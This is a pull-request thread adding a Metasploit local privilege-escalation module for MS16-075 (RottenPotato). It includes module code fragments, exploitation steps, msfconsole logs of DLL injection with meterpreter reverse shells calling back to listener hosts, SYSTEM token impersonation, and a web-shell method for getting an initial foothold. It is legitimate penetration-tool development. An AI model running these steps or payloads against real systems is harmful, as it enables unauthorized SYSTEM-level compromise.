### PR TITLE
DCOM/RPC NTLM  Reflection MS16-075 (Reflective DLL)

### PR DESCRIPTION
**Pull request by ghost**
## About 

The module exploits the SeImpersonatePrivilege given to service accounts on Windows which enables us to forge tokens and impersonate NT AUTHORITY\SYSTEM. As it utilizes reflective injection it solves the permission issues as well as doesn't leave behind traces. It can be used in an existing session where the account has SeImpersonatePrivilege. It spawns a new notepad process and injects the RottenPotato dll into it's memory which points to the shellcode and execute it. However, once the exploit is completed we need to load the incognito extension and then impersonate the token manually. 

## Verification

List the steps needed to make sure this thing works
 
- [x] Start `msfconsole`
- [x] Pop shell?
- [x] `use exploit/windows/local/ms16_075_reflection`
- [x] `set SESSION <session>`
- [x] `set TARGET <remote architecture index>`
- [x] `set PAYLOAD <payload>`
- [x] `run`
- [x] In new shell, type `load incognito`
- [x] `impersonate_token('NT AUTHORITY\SYSTEM')`
- [x] **Verify** should successfully impersonate the token
- [x] ????
- [x] PROFIT!
- [x] **Verify** it properly runs through and gives the new token
- [x] **Documentation will be done, wanted to check on your guys opinion on it first**

### Demo 

```
  Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  48               yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     ens3             yes       The listen address (an interface may be specified)
   LPORT     3312             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows x64


msf exploit(windows/local/ms16_075_reflection) > run

[*] Started reverse TCP handler on -snip-:3312
[*] Launching notepad to host the exploit...
[+] Process 3564 launched.
[*] Reflectively injecting the exploit DLL into 3564...
[*] Injecting exploit into 3564...
[*] Exploit injected. Injecting payload into 3564...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (206403 bytes) to -snip-
[*] Meterpreter session 49 opened (-snip-:3312 -> -snip-:55306) at 2018-08-03 01:54:18 -0400

meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > impersonate_token 'NT AUTHORITY\SYSTEM'
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getsystem -t 1
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
```

*gotta love session 48*

I would hope to get this PR'd alot sooner but I;d been stuck and at this point I figured I may as well Pr and ask for expert advice to get this ball rolling! apologies in advance.

### CODE REVIEW

**Comment by jmartin-r7** [comment]
Please check with `tools/dev/msftidy.rb` and correct reported items.

**Comment by realoriginal** [comment]
Should be fixed now @jmartin-r7 =)

**Comment by jmartin-r7** [comment]
Jenkins test this please.

**Comment by realoriginal** [comment]
Praying to the Travis god this one fixes it

**Comment by realoriginal** [comment]
Aight @jmartin-r7 fixed all the problems with the module, is there any reason why the "Sanity Test Execution" would fail?

**Comment by jmartin-r7** [comment]
Jenkins test this please.

Looks like there may have been an issue with the run, this may clear it.

**Comment by bwatters-r7** [comment]
Thanks for the PR, @realoriginal!  I'm going to start working with this to get it landed over the next few days.  First, I do not see documentation with this, and that would help a lot.  If you have questions, feel free to ask and check out https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation.  Specifically, since this has source code, please make sure to include compilation instructions.

**Comment by realoriginal** [comment]
Would providing an SLN file help? I mostly rely on those and not entirely fluent in Visual Studio to get a derative of cl.exe & linker commands itself from it as I rely mostly on the automated "build" @bwatters-r7 

and will do , I'll bust out the docs tomorrow. I was originally uncertain as I wasnt sure if you guys were happy with the reliance on incognito to impersonate the token which is why i refrained from writing on yet, but it shall be done =).

Thank you!

**Comment by bwatters-r7** [comment]
@realoriginal a .sln file would be great, though the current metasploit "standard" is Visual studio 2013.  If you send a .sln file in that format, that's awesome, but I am willing to work with whatever you can provide.

**Comment by realoriginal** [comment]
Added a solution file, almost done with documentation.

I dont have Visual Studio 2013 and apparently on my machine it refused to installl so I used the one I compiled originally with, VS-2017. Hopefully this helps slightly.

@bwatters-r7

**Comment by realoriginal** [comment]
DCOM is done!

**Comment by bwatters-r7** [comment]
FYI, I am looking into the sanity testing failures.... I think this was a false positive.
image

**Comment by realoriginal** [comment]
Ah gotcha. Hopefully anyhow haha.

**Comment by bwatters-r7** [comment]
(@realoriginal , this is not a problem with your PR, but with something around the automated sanity testing.  I am commenting here to help explain and determine the problem.)

This is that odd, difficult-to-reproduce bug that I have not yet figured out that appears occasionally in automated testing.
According to the netstat output of the target VM, the payload called back, but received no response:
`  TCP    192.168.16.182:49692   192.168.15.31:30004    SYN_SENT        InHost`
According to the PCAP from the metasploit host, the SYN packet never happened:
image

I bet if we kick this off again, it will pass.  cc @jmartin-r7

**Comment by bwatters-r7** [comment]
Jenkins test this please

**Comment by jmartin-r7** [comment]
Jenkins test this please.

One more time 🤞

**Comment by bwatters-r7** [comment]
Having some trouble with this.
When I test on Windws 7x64 SP1, it fails.
```
msf exploit(psexec) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN7X64-SP1
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN7X64-SP1\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(psexec) > use exploit/windows/local/ms16_075_reflection 
msf exploit(ms16_075_reflection) > show options

Module options (exploit/windows/local/ms16_075_reflection):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf exploit(ms16_075_reflection) > set session 1
session => 1
msf exploit(ms16_075_reflection) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf exploit(ms16_075_reflection) > set lhost 192.68.135.111
lhost => 192.68.135.111
msf exploit(ms16_075_reflection) > set lport 4545
lport => 4545
msf exploit(ms16_075_reflection) > set target 1
target => 1
msf exploit(ms16_075_reflection) > run

[-] Handler failed to bind to 192.68.135.111:4545
[*] Started HTTPS reverse handler on https://0.0.0.0:4545
[*] Launching notepad to host the exploit...
[+] Process 2988 launched.
[*] Reflectively injecting the exploit DLL into 2988...
[*] Injecting exploit into 2988...
[*] Exploit injected. Injecting payload into 2988...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
msf exploit(ms16_075_reflection) > 

```
image

When I run it on Windows 10x64 1511, I get 
```
msf exploit(psexec) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN10X64-1511
OS              : Windows 10 (Build 10586).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN10X64-1511\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(psexec) > use exploit/windows/local/ms16_075_reflection 
msf exploit(ms16_075_reflection) > show options

Module options (exploit/windows/local/ms16_075_reflection):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf exploit(ms16_075_reflection) > set session 1
session => 1
msf exploit(ms16_075_reflection) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf exploit(ms16_075_reflection) > set lhost 192.168.135.111
lhost => 192.168.135.111
msf exploit(ms16_075_reflection) > set lport 4587
lport => 4587
msf exploit(ms16_075_reflection) > set target 1
target => 1
msf exploit(ms16_075_reflection) > show options

Module options (exploit/windows/local/ms16_075_reflection):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  none             yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.111  yes       The local listener hostname
   LPORT     4587             yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   1   Windows x64


msf exploit(ms16_075_reflection) > run

[*] Started HTTPS reverse handler on https://192.168.135.111:4587
[*] Launching notepad to host the exploit...
[+] Process 2760 launched.
[*] Reflectively injecting the exploit DLL into 2760...
[*] Injecting exploit into 2760...
[*] Exploit injected. Injecting payload into 2760...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
msf exploit(ms16_075_reflection) > 

```

I switched the solution to 2013 and made some tweaks, so this could all be my fault.  Could you please let me know the windows version you used for testing?There are a few possibilities for the crashes, and I will check them out tomorrow.

**Comment by jmartin-r7** [comment]
This looks interesting in the Windows 7 run:
```
[-] Handler failed to bind to 192.68.135.111:4545
[*] Started HTTPS reverse handler on https://0.0.0.0:4545
[*] Launching notepad to host the exploit...
```
Is it possible state corrupted for that run and something else was holding port `4545`?

**Comment by realoriginal** [comment]
I tested on Windows 7 x64 SP1 and Windows Server 2008 R2 as well as one of the 2012 builds in a CTF (ill get the correct OS soon) 

the only time i ever came across the problem of the host process crashing was when the Meterpreter arch did not match the target arch index; also when the user at which I abused did not have the SeImpersonate privilege ; and also when the target listener timed out and did not have the socket ready to accept connections. 

I was able to test both HTTP and TCP payloads on both arches


@bwatters-r7

**Comment by bwatters-r7** [comment]
@jmartin, yes, there was already a listener, I guess, _maybe_ it was still being used.  I reran it with no extra listeners and had the same result:
```
msf exploit(ms16_075_reflection) > run

[*] Started HTTPS reverse handler on https://192.168.135.111:4545
[*] Launching notepad to host the exploit...
[+] Process 2524 launched.
[*] Reflectively injecting the exploit DLL into 2524...
[*] Injecting exploit into 2524...
[*] Exploit injected. Injecting payload into 2524...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
msf exploit(ms16_075_reflection) > 

```
@realoriginal, when I drop back to the original PR code, I get the same result on Windows 7x64 SP1.

**Comment by bwatters-r7** [comment]
Also, @realoriginal you can see the changes I made in https://github.com/bwatters-r7/metasploit-framework/tree/land-10418

**Comment by realoriginal** [comment]
Yeah there doesnt appear to be anything that should be stopping you in the source, as you've just only replaced the dependencies in BlockingQueue and such..hm. What happens if you use the precompiles I posted? @bwatters-r7

**Comment by realoriginal** [comment]
I'll test your binaries and see what happens.

**Comment by bwatters-r7** [comment]
When I use your pre-compiled stuff, I get the same thing.  Honestly, my first thought was that it was trying to link to the CRT at runtime and it was not there, but you're statically linking, so `shrug`

I only changed the source enough to get it to compile.  For some reason on my side it could not find that header unless I added it.

**Comment by bwatters-r7** [comment]
I was going to run it through dependency walker to be sure later.

**Comment by bwatters-r7** [comment]
Is that a fresh install of Win7?  A VM?  I'd love to know what's different in our setups?

**Comment by bwatters-r7** [comment]
I am using a Windows 7x64 SP1 fresh install running on an ESXi server.

**Comment by realoriginal** [comment]
and just as I say that ,they crash. Huh.

**Comment by realoriginal** [comment]
NAh literally a fresh install, nothing changed just added SeImpersonate...weird.

**Comment by realoriginal** [comment]
Aight I just tested in two operating systems ill get more:

1. Windows x64 SP1 fresh install =>  (windows7x64_Sp1.pcap). Tested with x64 Meterpreter and x64 DLL
2. Windows .NET 2003 server Sp1 x86 => (winnetx86.pcap) Tested with x86 Meterpreter and x86 DLL

[rp_pcaps.zip](https://github.com/rapid7/metasploit-framework/files/2315876/rp_pcaps.zip)

I'll get more target testing in a bit. @bwatters-r7

**Comment by realoriginal** [comment]
Windows x64 7 SP1 however does crash with an x64 HTTP Session so..hm? 

```
meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter > sysinfo
Computer        : BTH-PC5
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege

meterpreter >
meterpreter > background
[*] Backgrounding session 8...
msf exploit(windows/local/ms16_075_reflection) > set SESSION 8
SESSION => 8
msf exploit(windows/local/ms16_075_reflection) > set TARGET 1
TARGET => 1
msf exploit(windows/local/ms16_075_reflection) > set PAYLOAD windows/x64/meterpreter/reverse_http
PAYLOAD => windows/x64/meterpreter/reverse_http
smsf exploit(windows/local/ms16_075_reflection) > set WfsDelay 50
WfsDelay => 50
msf exploit(windows/local/ms16_075_reflection) > set LHOST ens3
LHOST => ens3
smsf exploit(windows/local/ms16_075_reflection) > set LPORT 35613
LPORT => 35613
msf exploit(windows/local/ms16_075_reflection) > run

[*] Started HTTP reverse handler on http://45.63.13.23:35613
[*] Launching notepad to host the exploit...
[+] Process 8204 launched.
[*] Reflectively injecting the exploit DLL into 8204...
[*] Injecting exploit into 8204...
[*] Exploit injected. Injecting payload into 8204...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] http://45.63.13.23:35613 handling request from 71.47.24.136; (UUID: atiapjt4) Staging x64 payload (207449 bytes) ...
[*] Meterpreter session 10 opened (45.63.13.23:35613 -> 71.47.24.136:55976) at 2018-08-23 15:33:32 -0400

meterpreter > getuid
[-] Unknown command: getuid.
meterpreter > getuid
[-] Unknown command: getuid.
meterpreter > getuid
[-] Unknown command: getuid.
meterpreter > getuid
[-] Unknown command: getuid.
meterpreter > pwd
[-] Unknown command: pwd.
meterpreter > pwd
[-] Unknown command: pwd.
meterpreter > pwd
[-] Unknown command: pwd.
meterpreter > pwd
[-] Unknown command: pwd.
meterpreter > pwd
[-] Unknown command: pwd.
meterpreter > pwd
[-] Unknown command: pwd.
meterpreter >
```

So theres a first crash at least with HTTP but in the PCAPS were successsful with TCP sessions

@bwatters-r7

**Comment by bwatters-r7** [comment]
It is likely that the SeImpersonate is the cause.  What happens if that's not enabled?

**Comment by realoriginal** [comment]
Yeah appears like the HTTP/S payloads do kill the session on Windows x64 SP1 but not on Windows Server 2008 R2 with the DLL. hrm.

**Comment by realoriginal** [comment]
IT crashes the host process if you do not have SeImpersonate privilege (Which is required for the exploit anyhow)

**Comment by bwatters-r7** [comment]
Yeah; this should have a check function that makes sure that SeImpersonate is there.  That's what's happening as I had not set it.  Check out lib/msf/core/post/windows/mssql.rb

**Comment by realoriginal** [comment]
Done 👍 should check for the privilege now.

**Comment by realoriginal** [comment]
Just wanted to check, were you able to get it working on your end? @bwatters-r7

**Comment by bwatters-r7** [comment]
@realoriginal Sadly, no; I had to work on some other stuff, but I'll take a look again this week!  I'll try and verify the build errors today, though.

**Comment by bwatters-r7** [comment]
Travis is failing because of spaces at the end of lines:
```
modules/exploits/windows/local/ms16_075_reflection.rb:78 - [WARNING] Spaces at EOL
modules/exploits/windows/local/ms16_075_reflection.rb:81 - [WARNING] Spaces at EOL
modules/exploits/windows/local/ms16_075_reflection.rb:85 - [WARNING] Spaces at EOL
modules/exploits/windows/local/ms16_075_reflection.rb:90 - [WARNING] Spaces at EOL
modules/exploits/windows/local/ms16_075_reflection.rb:94 - [WARNING] Spaces at EOL
```
You can verify your changes locally using msftidy before pushing:
```
tmoose@ubuntu:~/rapid7/metasploit-framework$ ./tools/dev/msftidy.rb modules/exploits/windows/local/ms16_075_reflection.rb
modules/exploits/windows/local/ms16_075_reflection.rb:78 - [WARNING] Spaces at EOL
modules/exploits/windows/local/ms16_075_reflection.rb:81 - [WARNING] Spaces at EOL
modules/exploits/windows/local/ms16_075_reflection.rb:85 - [WARNING] Spaces at EOL
modules/exploits/windows/local/ms16_075_reflection.rb:90 - [WARNING] Spaces at EOL
modules/exploits/windows/local/ms16_075_reflection.rb:94 - [WARNING] Spaces at EOL

```

**Comment by bwatters-r7** [comment]
Also, please run this through rubocop.  You can find a write-up for how to install, run, and interpret the results here: https://github.com/rapid7/metasploit-framework/wiki/Using-Rubocop

**Comment by bwatters-r7** [comment]
Also, how are you adding SeImpersonate?

**Comment by jmartin-r7** [comment]
Jenkins test this please.

Sorry looks like an intermittent issue with writing files on windows meterpreter.  Retest *should* pass.

**Comment by realoriginal** [comment]
Cheated a little bit instead by just starting IIS, writing a web shell, popping a meterpreter webshell from there then running it (since IIS user has SeImpersonationPrivilege by default) @bwatters-r7

**Comment by realoriginal** [comment]
Sure I shall fix the issues.

**Comment by bwatters-r7** [comment]
I see you fixed the newlines, but msftidy is still failing because there are still some spaces following lines:
```
tmoose@ubuntu:~/rapid7/metasploit-framework$ ./tools/dev/msftidy.rb modules/exploits/windows/local/ms16_075_reflection.rb
modules/exploits/windows/local/ms16_075_reflection.rb:74 - [WARNING] Spaces at EOL
modules/exploits/windows/local/ms16_075_reflection.rb:77 - [WARNING] Spaces at EOL
modules/exploits/windows/local/ms16_075_reflection.rb:83 - [WARNING] Spaces at EOL
modules/exploits/windows/local/ms16_075_reflection.rb:88 - [WARNING] Spaces at EOL
modules/exploits/windows/local/ms16_075_reflection.rb:92 - [WARNING] Spaces at EOL
modules/exploits/windows/local/ms16_075_reflection.rb:96 - [WARNING] Spaces at EOL
```

**Comment by wvu-r7** [comment]
@realoriginal: I took care of it with a ninja push. I also merged `master` because this branch has diverged quite a bit. :)

```
wvu@kharak:~/metasploit-framework:pr/10418$ git push -f git@github.com:realoriginal/metasploit-framework HEAD:ms16_reflection
Counting objects: 36924, done.
Delta compression using up to 4 threads.
Compressing objects: 100% (11406/11406), done.
Writing objects: 100% (36924/36924), 23.96 MiB | 2.40 MiB/s, done.
Total 36924 (delta 27984), reused 33614 (delta 24941)
remote: Resolving deltas: 100% (27984/27984), completed with 1210 local objects.
To github.com:realoriginal/metasploit-framework
   0887236f5e..1d091408f7  HEAD -> ms16_reflection
wvu@kharak:~/metasploit-framework:pr/10418$
```

**Comment by wvu-r7** [comment]
@realoriginal: I may have been mistaken about the CVE, so please fix it if it's wrong!

File: modules/exploits/windows/local/ms16_075_reflection.rb [hunk 1]
```diff
@@ -0,0 +1,135 @@
...
+          ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'],
+          ['URL', 'https://github.com/breenmachine/RottenPotatoNG']
+        ],
+      'DisclosureDate' => 'Jan 16 2016',
+      'DefaultTarget'  => 0
+    }))
+  end
+
+  def check_arch
+    os = sysinfo["OS"]
```
Comment (bcoles) [inline modules/exploits/windows/local/ms16_075_reflection.rb]: Unused variable `os`.

File: modules/exploits/windows/local/ms16_075_reflection.rb [hunk 2]
```diff
@@ -0,0 +1,135 @@
...
+      if session.railgun.kernel32.IsWow64Process(-1, 4)["Wow64Process"] == "\x00\x00\x00\x00"
+        arch = ARCH_X64
+      else
+        arch = ARCH_X86
+      end
+    elsif sysinfo["Architecture"] == ARCH_X86
+      arch = ARCH_X86
+    end
+
+    return arch
```
Comment (bcoles) [inline modules/exploits/windows/local/ms16_075_reflection.rb]: In theory, `arch` could be undefined here. Or, more specifically, `arch` will be `arch` from the global scope. Not sure if that's intended...

File: modules/exploits/windows/local/ms16_075_reflection.rb [hunk 3]
```diff
@@ -0,0 +1,135 @@
...
+    if privs.include?('SeImpersonatePrivilege')
+      return Exploit::CheckCode::Detected
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    if check == Exploit::CheckCode::Safe
+      fail_with(Failure::None, 'User does not have the SeImpersonate Privilege')
```
Comment (bcoles) [inline modules/exploits/windows/local/ms16_075_reflection.rb]: `Failure::NoAccess` might be more appropriate.

File: modules/exploits/windows/local/ms16_075_reflection.rb [hunk 4]
```diff
@@ -0,0 +1,135 @@
...
+    begin
+      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
+      print_good("Process #{process.pid} launched.")
+    rescue Rex::Post::Meterpreter::RequestError
+      print_error('Operation failed. Trying to elevate the current process...')
+      process = client.sys.process.open
+    end
+
+    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
+    architecture = check_arch
```
Comment (bcoles) [inline modules/exploits/windows/local/ms16_075_reflection.rb]: As you're detecting the architecture, you could probably implement automatic targeting too.

Something like:

```ruby
      'Targets'        =>
        [
          ['Automatic', {}],
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
        ],

# ...

    if target.name.eql? 'Automatic'
      case check_arch
      when ARCH_X86
        my_target = targets[1]
      when ARCH_X64
        my_target = targets[2]
      else
        fail_with Failure::NoTarget, 'Unable to automatically select a target'
      end
    else
      my_target = target
    end
    print_status "Using target: #{my_target.name}"

    if my_target =~ /x64/
      dll_file_name = 'rottenpotato.x64.dll'
    else
      dll_file_name = 'rottenpotato.x86.dll'
    end
```

**Review by bcoles — COMMENTED** [review]
nitpicks

**Comment by realoriginal** [comment]
Aight I'll give those a fix and thank you very much!

**Comment by realoriginal** [comment]
I'm pretty sure its the right CVE but I'll check again @wvu-r7

File: modules/exploits/windows/local/ms16_075_reflection.rb (hunk 2 above)
Comment (realoriginal) [reply modules/exploits/windows/local/ms16_075_reflection.rb]: unintended entirely

File: modules/exploits/windows/local/ms16_075_reflection.rb (hunk 4 above)
Comment (realoriginal) [reply modules/exploits/windows/local/ms16_075_reflection.rb]: Hm , I'll definitely do that, its a far better idea then what I'd done

**Review by bwatters-r7 — COMMENTED** [review]
This was a quick look-over.  I want to dig into the C code a bit more tomorrow.

File: modules/exploits/windows/local/ms16_075_reflection.rb [hunk 5]
```diff
@@ -0,0 +1,135 @@
...
+  def exploit
+    if check == Exploit::CheckCode::Safe
+      fail_with(Failure::None, 'User does not have the SeImpersonate Privilege')
+    end
+
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    if sysinfo["Architecture"] =~ /wow64/i
```
[the remark this answers is not in the document]
Comment (OJ) [reply modules/exploits/windows/local/ms16_075_reflection.rb]: Are we sure that `Architecture` contains `wow64` any more? I thought we removed that. If the intent is to detect if the current process is wow64 then you need to check both `client.arch` (to get the arch of Meterpreter) and `sysinfo['Architecture']` (to get the arch of the OS).

``` ruby
if client.arch != sysinfo['Architecture']
  # gotta be a wow64 process
end
```

**Comment by bwatters-r7** [comment]
Note to future self (or anyone who is as bad as I am with IIS) for setting up a test environment:
Win 2K8x64 server
Install IIS, including cassic ASP roles
Change the write permissions on the webroot directory
Inside the default web site under anonymous authentication, click 'Edit' and use 'Application Pool identity'
Upload and visit asp payload.

File: modules/exploits/windows/local/ms16_075_reflection.rb [hunk 6]
```diff
@@ -0,0 +1,135 @@
...
+      end
+    elsif sysinfo["Architecture"] == ARCH_X86
+      arch = ARCH_X86
+    end
+
+    return arch
+  end
+
+  def check
+    privs = client.sys.config.getprivs
```
[the remark this answers is not in the document]
Comment (bwatters-r7) [reply modules/exploits/windows/local/ms16_075_reflection.rb]: Is there a better way to check for SeImpersonatePrivilege?  I found no other check....

**Comment by bwatters-r7** [comment]
I made a couple changes per the suggestions.  I need to go back and fix the reference in the C++ to the conditional variable, as it does not compile using the v120 toolset.  I've dealt with that error before, but I do forget what I did to solve it.  I'll hit it again tomorrow and try to land it.

**Comment by bwatters-r7** [comment]
oooop- also need to fix the markdown document name....

File: modules/exploits/windows/local/ms16_075_reflection.rb [hunk 7]
```diff
@@ -60,44 +61,62 @@ def initialize(info={})
...
     if is_system?
       fail_with(Failure::None, 'Session is already elevated')
     end
-
-    if sysinfo["Architecture"] =~ /wow64/i
-      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
+    my_target = assign_target()
+    print_status("#{my_target["arch"]}")
+    verify_arch(my_target)
+    check()
```
Comment (bwatters-r7) [inline modules/exploits/windows/local/ms16_075_reflection.rb]: Oooops; I should probably, you know... _do_ something with this value.

**Comment by bwatters-r7** [comment]
@realoriginal, I'm having trouble getting the exploit to run when I recompile it.  I switched it to 2013 and fixed the error, but It fails when I run it:
```
msf5 exploit(windows/local/ms16_075_reflection) > run

[*] Started HTTPS reverse handler on https://192.168.135.111:4567
[*] Found we are on an x64 target
[*] x64
[+] Current payload and target Arch match....
[*] Assigning payload rottenpotato.x64.dll
[*] Launching notepad to host the exploit...
[+] Process 1336 launched.
[*] Reflectively injecting the exploit DLL into 1336...
[*] Injecting exploit into 1336...
[*] Exploit injected. Injecting payload into 1336...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ms16_075_reflection) > 

```
I went ahead and installed 2015U3 and could compile it with no changes, and it still fails.  Could you double check the solution file and source code?  The original binary seems to work fine, but recompiling results in a binary that fails.

Thanks

**Comment by realoriginal** [comment]
Checked, no code issues that I saw when reviewing the source.

Solutions file seems to have everything needed in it to compile the RELEASE builds.

Hm. I wouldn't have a clue without debugging it as a normal DLL to understand what could be wrong with building with vs 2015 and 2013 toolkits @bwatters-r7

**Comment by bwatters-r7** [comment]
So.... uh, this is interesting.
When I compile this with 2013, I have to change build tools to 120 and add an include for `condition_variable`, then it compiles fine, but fails to work.
When I compile it with VS2015U3, I need to switch to build tools 140, but I do not need to add the include, and it compiles fine but does not work.....
When I compile it with VS2017, I need to change nothing, and it works.

Honestly, I am not OK with this.... I need to read up on some things and double check I'm not messing something else up.

**Comment by bwatters-r7** [comment]
# Release Notes
This adds a module using MS16-075 for local privilege escalation on vulnerable Windows systems.

**Pull request merged**